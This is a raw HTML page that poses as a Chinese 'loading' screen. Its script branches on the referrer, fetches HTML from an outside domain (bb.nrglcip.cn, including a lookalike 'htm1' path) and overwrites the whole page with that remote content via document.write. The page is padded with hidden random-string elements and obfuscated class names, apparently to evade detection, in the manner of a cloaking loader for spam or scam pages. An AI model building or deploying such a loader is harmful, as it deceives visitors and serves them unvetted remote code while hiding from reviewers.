<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kNJUbp6q6Xo {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kNJUbp6q6Xo .GyR5k2OJzaG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kNJUbp6q6Xo .content {
            line-height: 50px;
            text-align: center
        }

        .kNJUbp6q6Xo .img {
            width: 100%
        }

        .kNJUbp6q6Xo .Kpf12xuvQ {
            text-align: center
        }

        .kNJUbp6q6Xo .Kpf12xuvQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kNJUbp6q6Xo .Kpf12xuvQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kNJUbp6q6Xo .Kpf12xuvQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kNJUbp6q6Xo .Kpf12xuvQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kNJUbp6q6Xo .Kpf12xuvQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kNJUbp6q6Xo .Kpf12xuvQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kNJUbp6q6Xo .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KPtvnUgli(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var j9suf = KPtvnUgli('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ j9suf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ j9suf +".html?a=share";
		}
		
        hduT37GS=url+"#"+new Date().getTime();
        hduT37GS && function() {
            $.get(hduT37GS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >cfi3girORjTUlpC</li>
<a  href='#' style='display:none'>Rya0xm3NX0andCFNgXMEKz98QDUewof7nemrU5mEXLTpBzab8c9aqIBWfv7qn5LoFL9DByXk3J4OBLw2nWyZy</a>
<img  src='' style='display:none'>
<ul style='display:none' >alsXTAiToIrMuhgOGgHPPYLTJ8YYAhlmzw2pBJQNY820LsGCKBp4St5lMp2Yy5xzQYydoivV4UV2KSpFSmBKLgdgB3Mk</ul>
<b style='display:none' >uiKeazKu6Kb1o2lSuoafbdBXttw1nTM1Ws7Ahssz0Z82v</b>
<li style='display:none' >cfi3girORjTUlpC</li>
<div style='display:none'>v60oW1aXz3KLJdmDTk1rYTrp</div>
<b style='display:none' >uiKeazKu6Kb1o2lSuoafbdBXttw1nTM1Ws7Ahssz0Z82v</b><div class="kNJUbp6q6Xo">
    <div class="GyR5k2OJzaG">
        <div class="Kpf12xuvQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >lQ50lcKwNz1BmiieTaBoSNoNiCUKtJcj3nFcUbRApgvdqiXMj2lljbmG0atSYXZ476soXAbL5UGf5yc3OKFx5TjkJnH7xihRa</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>dhoMb3b7CF0pigrYJapy2KDgAUpfC</a></body>
</html>